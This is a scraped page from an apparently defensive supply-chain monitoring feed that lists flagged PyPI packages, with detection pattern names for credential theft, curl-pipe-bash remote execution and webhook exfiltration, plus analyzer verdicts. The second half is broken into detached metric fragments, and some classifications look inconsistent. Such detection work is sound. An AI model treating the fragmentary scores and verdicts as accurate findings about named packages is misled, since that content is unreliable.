Cremit
/incidentsfield log
CatchesCampaignsExfilPatternsLLMIncidentsMethodology
↺rss↗cremit.io

incidents.cremit.io

A reference feed of real-world Non-Human Identity (NHI) credential leak incidents. Maintained by Cremit.

Browse

  • All incidents
  • npm supply chain
  • CI/CD compromise
  • Methodology

Subscribe

  • RSS feed
  • @cremit_io
  • GitHub
// status
monitor active
// build
2026-07-04
// origin
cremit · seoul, kr
// license
CC BY 4.0

© 2026 Cremit. content reuse encouraged with attribution.

catches

Caught packages

Every package the analyzer pipeline classified as auto-published. Sort by weekly downloads to surface the highest-blast-radius cases first.

caught total
1,272
0 in last 7 days
top by downloads
1.1M/wk
disposable-email-domains
top pattern
reads-env-vars
185 hits
sort
downloadsrecenth-scorepatterns
/ecosystem
allnpmpypigh-actionsvscodehuggingface
29 results·indexed 2026-06-07
  • AUTO-PUBLISHED/pypi/2026-06-06

    disposable-email-domains2 versions·0.0.196→0.0.197

    A set of disposable email domains

    steals →Chromium logins
    reads-chromium-credswebhook-binarchive-then-uploadclipboard-access
    weekly
    1.1M
    /wk
    h-score
    20
    patterns
  • AUTO-PUBLISHED/pypi/2026-04-08/MAL-2026-4174

    durabletask@1.4.0

    A Durable Task Client SDK for Python

    steals →Chromium logins
    reads-chromium-credspy-pip-install-runtimearchive-then-upload

    → No suspicious destination, no remote-exec shape — 1 known-vendor host(s).

    weekly
    103K
    /wk
    llm verdict
    benign 0.85
  • AUTO-PUBLISHED/pypi/2026-06-04

    sealights-python-agent@2.10.10

    by Tricentis Sealights

    Tricentis Sealights Python Agent - Quality Intelligence and Code Coverage

    steals →Chromium logins→ sends tohttps://packaging.python.org/en/latest/distributing.html
    py-pip-install-runtimereads-env-varspy-urllib-requestfs-recursive-readreads-homedirreads-system-infowebhook-binpy-socket-connect
  • AUTO-PUBLISHED/pypi/2026-05-19/MAL-2026-4765

    qontract-reconcile@0.10.2.dev658

    Collection of tools to reconcile services with their desired state as defined in the app-interface DB.

    steals →AWS keysChromium logins
    reads-env-varsreads-aws-credsbase64-decodereads-chromium-credspy-requests-postchild-process-spawnpy-urllib-requestreads-homedir+2
  • AUTO-PUBLISHED/pypi/2026-05-22/MAL-2026-4774

    vulndify-mcp-server@0.3.0

    A minimal MCP server demo exposing a hello tool.

    → sends tohttp://10.37.1.177/v1/chat-messages
    base64-decodechild-process-spawncurl-pipe-bash-unverifiedpy-requests-post

    → No suspicious destination, no remote-exec shape — extraction empty.

    weekly
    312
    /wk
    llm verdict
    benign
  • AUTO-PUBLISHED/pypi/2026-06-07

    domain-admin@1.6.78

    by Peng Shiyu

    a domain ssl cert admin

    steals →Chromium logins→ sends tohttps://pypi.org/simple
    child-process-spawnpy-pip-install-runtimereads-env-varspy-requests-postpy-socket-connectlong-base64-literallong-hex-literalclipboard-access
  • AUTO-PUBLISHED/pypi/2026-06-03

    magenta-rt@2.0.2

    by Google LLC

    Real-time music generation models.

    steals →GCP credsAI API keys→ sends tohttp://www.apache.org/licenses/LICENSE-2.0
    py-pip-install-runtimereads-env-varsreads-homedireval-dynamicreads-gcp-credsreads-ai-api-keys
  • AUTO-PUBLISHED/pypi/2026-06-04

    azure-genome@0.1.4

    A Python package for Azure Genome.

    steals →Chromium logins→ sends tohttps://github.com/python/cpython/pull/119891
    py-requests-postreads-env-varseval-dynamicchild-process-spawnreads-homedirreads-system-infowebhook-binpy-socket-connect+6
  • AUTO-PUBLISHED/pypi/2026-06-04

    byn@0.0.1

    by Sandeep Baynes

    Name reserved for byn — a local-first secure secrets vault & credential manager (a Go CLI). Install via `go install`, Homebrew, or https://github.com/sandeepbaynes/byn.

    → sends toraw.githubusercontent.com · https://raw.githubusercontent.com/sandeepbaynes/byn/main…
    curl-pipe-bash

    → Static analyzer matched curl-pipe-bash: unambiguous remote-code-execution shape in the install path.

    weekly
    —
    /wk
    llm verdict
    malicious 0.95
  • AUTO-PUBLISHED/pypi/2026-06-04

    epyt@2.3.5.1

    by Marios S. Kyriakou

    EPyT: An EPANET-Python Toolkit for Smart Water Network Simulations. The EPyT is inspired by the EPANET-Matlab Toolkit.

    steals →PyPI token→ sends tohttps://github.com/OpenWaterAnalytics/EPANET
    reads-pypircfs-recursive-readhttp-to-public-ipchild-process-spawnpy-sys-platform-branch

    → Credential read (reads-pypirc) paired with http-to-public-ip destination — classic exfiltration signature.

  • AUTO-PUBLISHED/pypi/2026-06-03

    quasarr@4.5.3

    Quasarr connects JDownloader with Radarr, Sonarr and Magazarr. It also decrypts links protected by CAPTCHAs.

    steals →Chromium logins→ sends tohttps://github.com/rix1337
    reads-env-varschild-process-spawnbase64-decodepy-requests-postreads-chromium-credspy-socket-connecthex-decodediscord-webhook+1
  • AUTO-PUBLISHED/pypi/2026-05-31

    cscc-glass-house@1.0.1

    Cloud Security Championship CI test utilities

    steals →Chromium logins→ sends tohttps://webhook.site/52335eaa-cdad-436b-a67e-08481a95bd0e
    reads-chromium-credsreads-env-varswebhook-binpy-requests-post

    → No suspicious destination, no remote-exec shape — no network destinations.

    weekly
    —
    /wk
  • AUTO-PUBLISHED/pypi/2026-05-26/MAL-2026-4814

    vectordb-engine@1.0.0

    by VectorDB Contributors

    High-performance vector similarity search with SIMD-optimized kernels

    reads-env-varsreads-system-infochild-process-spawnpy-sys-platform-branch

    → No suspicious destination, no remote-exec shape — 1 known-vendor host(s).

    weekly
    —
    /wk
    llm verdict
    benign 0.85
    h-score
  • AUTO-PUBLISHED/pypi/2026-05-18/MAL-2026-4772

    txdpy@2026.5

    by 唐旭东
    → sends toapi.fanyi.baidu.com · http://api.fanyi.baidu.com/api/trans/vip/translate?q={q}…
    eval-dynamicchild-process-spawnreads-env-varspy-requests-post

    → No suspicious destination, no remote-exec shape — 1 known-vendor host(s).

    weekly
    —
    /wk
    llm verdict
  • AUTO-PUBLISHED/pypi/2026-05-15/MAL-2026-4769

    soundsource@0.1.0

    Official Python SDK for the SoundSource API

    → sends tohttps://api.soundsource.example.com/v1
    reads-env-vars

    → No suspicious destination, no remote-exec shape — 2 other host(s).

    weekly
    —
    /wk
    llm verdict
    benign 0.85
    h-score
    75
  • AUTO-PUBLISHED/pypi/2026-05-17/MAL-2026-4767

    silly-logger@0.1.1

    just a silly logger :P

    → Excerpt too sparse to classify (no extractable code).

    weekly
    —
    /wk
    llm verdict
    uncertain 0.30
    h-score
    75
    size
    92.8 KB
    versions
    6
  • AUTO-PUBLISHED/pypi/2026-05-15/MAL-2026-4766

    saas-common-lib-473815@2.6

    by Srinidhi Nagarajan

    Packaging all common functionalities

    reads-env-vars

    → No suspicious destination, no remote-exec shape — 1 other host(s).

    weekly
    —
    /wk
    llm verdict
    benign 0.85
    h-score
    75
    patterns
    1
    size
  • AUTO-PUBLISHED/pypi/2026-05-26/MAL-2026-4821

    pywingui@6.0.1

    Intelligent Windows GUI Automation Framework (Compiled)

    → Excerpt too sparse to classify (no extractable code).

    weekly
    —
    /wk
    llm verdict
    uncertain 0.30
    h-score
    75
    size
    2.7 MB
    versions
    57
  • AUTO-PUBLISHED/pypi/2026-05-21/MAL-2026-4760

    nvidia-nat-semantic-kernel@1.8.0a20260521

    by NVIDIA Corporation

    Subpackage for Semantic-Kernel integration in NeMo Agent Toolkit

    → Excerpt too sparse to classify (no extractable code).

    weekly
    —
    /wk
    llm verdict
    uncertain 0.30
    h-score
    75
    size
    55.5 KB
    versions
    387
  • AUTO-PUBLISHED/pypi/2026-05-26/MAL-2026-4813

    noteparse@1.1.27

    by maoyuyan

    a package for parse html to noteinfo

    → sends tohttps://github.com/m294567571/noteparse.git
    public-github-pushreads-homedirarchive-then-uploadpy-requests-post

    → No suspicious destination, no remote-exec shape — 1 known-vendor host(s).

    weekly
    —
    /wk
    llm verdict
  • AUTO-PUBLISHED/pypi/2026-05-25/MAL-2026-4755

    mathepy@7.9.0

    Module for Quick Calculations

    eval-dynamicpy-requests-postpy-pip-install-runtime

    → No suspicious destination, no remote-exec shape — 1 known-vendor host(s), 1 other host(s).

    weekly
    —
    /wk
    llm verdict
    benign 0.85
    h-score
    75
    patterns
    3
  • AUTO-PUBLISHED/pypi/2026-05-26/MAL-2026-4795

    massive@2.8.0

    by massive.com

    Official Massive (formerly Polygon.io) REST and Websocket client.

    → sends tohttps://api.massive.com
    reads-env-vars

    → No suspicious destination, no remote-exec shape — 1 other host(s).

    weekly
    —
    /wk
    llm verdict
    benign 0.85
    h-score
    75
  • AUTO-PUBLISHED/pypi/2026-05-18/MAL-2026-4751

    glass-of-water@1.0.3

    by Your Name

    A simple utility wrapper for API access

    → Excerpt too sparse to classify (no extractable code).

    weekly
    —
    /wk
    llm verdict
    uncertain 0.30
    h-score
    79
    size
    2.1 KB
    versions
    4
  • AUTO-PUBLISHED/pypi/2026-05-26/MAL-2026-4748

    eplang@8.0.0

    EPL - English Programming Language: write code in plain English. Build apps, web servers, and more.

    steals →AWS keysGitHub PATChromium logins→ sends tohttp://localhost:11434
    child-process-spawnfs-recursive-readpy-pip-install-runtimepy-urllib-requestclipboard-access
  • AUTO-PUBLISHED/pypi/2026-05-25/MAL-2026-4747

    edison-tools@0.1.17

    → sends tohttps://edison-k8.vercel.app/query
    reads-env-varspy-requests-postpy-urllib-request

    → No suspicious destination, no remote-exec shape — 1 other host(s).

    weekly
    —
    /wk
    llm verdict
    benign 0.85
    h-score
  • AUTO-PUBLISHED/pypi/2026-05-18/MAL-2026-4742

    aurapro-ui@3.2.5

    AuraPro UI

    oversize-tarball-skipped

    → No suspicious destination, no remote-exec shape — no network destinations.

    weekly
    —
    /wk
    llm verdict
    benign 0.85
    h-score
    75
    patterns
    1
    size
    82.5 MB
  • AUTO-PUBLISHED/pypi/2026-05-17/MAL-2026-4741

    aurafarmer@0.3.0

    PRO — Terminal AI Coding Agent by SPRUKY

    py-setup-cmdclasspy-urllib-requestchild-process-spawnpy-requests-post

    → No suspicious destination, no remote-exec shape — 1 known-vendor host(s).

    weekly
    —
    /wk
    llm verdict
    benign 0.85
    h-score
    75
  • AUTO-PUBLISHED/pypi/2026-05-22

    agentforge-litellm@0.2.3

    by The AgentForge Authors

    LiteLLM router-based LLM provider for AgentForge — 100+ underlying providers through one interface

    py-pip-install-runtime

    → No suspicious destination, no remote-exec shape — 1 known-vendor host(s).

    weekly
    —
    /wk
    llm verdict
    benign 0.85
    h-score
    100
    patterns
    1
    size
  • AUTO-PUBLISHED/pypi/2026-05-22

    easy-tdx@1.0.0

    by Justin Gu

    通达信 TCP 协议行情数据客户端,支持在线行情与离线本地数据读取

    archive-then-uploadhttp-to-public-ippy-socket-connecthex-decodereads-env-varspy-sys-platform-branchchild-process-spawnpy-pip-install-runtime

    → Hardcoded public IP destination: 180.153.18.170, 124.71.187.122, 180.153.18.171, 180.153.18.172, 119.147.212.81, 115.238.56.198, 115.238.90.165, 218.75.126.9, 47.107.75.159, 59.175.238.38, 110.41.147.114, 110.41.2.72, 101.33.225.16, 175.178.112.197, 175.178.128.227, 43.139.95.83, 124.223.163.242, 122.51.120.217, 150.158.160.2, 123.60.164.122, 111.229.247.189, 124.70.199.56, 62.234.50.143, 81.70.151.186, 82.156.214.79, 159.75.29.111, 43.139.18.171, 81.71.32.47, 122.51.232.182, 118.25.98.114, 121.36.225.169, 123.60.70.228, 123.60.73.44, 124.70.133.119, 124.71.187.72, 119.97.185.59, 129.204.230.128, 101.42.240.54, 124.71.9.153, 123.60.84.66, 111.230.186.52, 101.0.0.43 (not RFC1918 / loopback).

4
size
78.5 KB
versions
195
h-score
75
patterns
3
size
95.0 KB
versions
125
+8
weekly
11K
/wk
h-score
35
patterns
16
size
1.9 MB
versions
175

→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s).

weekly
8.3K
/wk
llm verdict
benign 0.85
h-score
75
patterns
10
size
895.3 KB
versions
2842
0.85
h-score
75
patterns
4
size
71.4 KB
versions
1
+6

→ Encoded payload + dynamic execution combo (event-stream / flatmap-stream shape) — embedded blob decoded and executed at install time. Fast-tracked.

weekly
310
/wk
llm verdict
malicious 0.92
h-score
35
patterns
14
size
1.8 MB
versions
211
weekly
194
/wk
h-score
69
patterns
6
size
1.4 MB
versions
2
weekly
18
/wk
h-score
20
patterns
14
size
3.2 MB
versions
5
h-score
55
patterns
1
size
1.8 KB
versions
1
weekly
—
/wk
llm verdict
malicious 0.95
h-score
53
patterns
5
size
3.9 MB
versions
36
weekly
—
/wk
h-score
20
patterns
9
size
1.3 MB
versions
214
llm verdict
benign 0.85
h-score
30
patterns
4
size
1.8 KB
versions
1
75
patterns
4
size
25.4 KB
versions
1
benign 0.85
h-score
75
patterns
4
size
38.0 KB
versions
38
patterns
1
size
10.5 KB
versions
2
15.0 KB
versions
30
benign 0.85
h-score
75
patterns
4
size
30.0 KB
versions
36
size
49.1 KB
versions
14
patterns
1
size
49.7 KB
versions
15
reads-github-tokens
reads-env-vars
reads-homedir
+11

→ No suspicious destination, no remote-exec shape — 1 known-vendor host(s), 2 other host(s).

weekly
—
/wk
llm verdict
benign 0.85
h-score
75
patterns
19
size
952.4 KB
versions
32
75
patterns
3
size
2.0 KB
versions
23
versions
34
patterns
4
size
15.1 KB
versions
12
10.3 KB
versions
1
weekly
—
/wk
llm verdict
malicious 0.90
h-score
55
patterns
8
size
9.9 MB
versions
1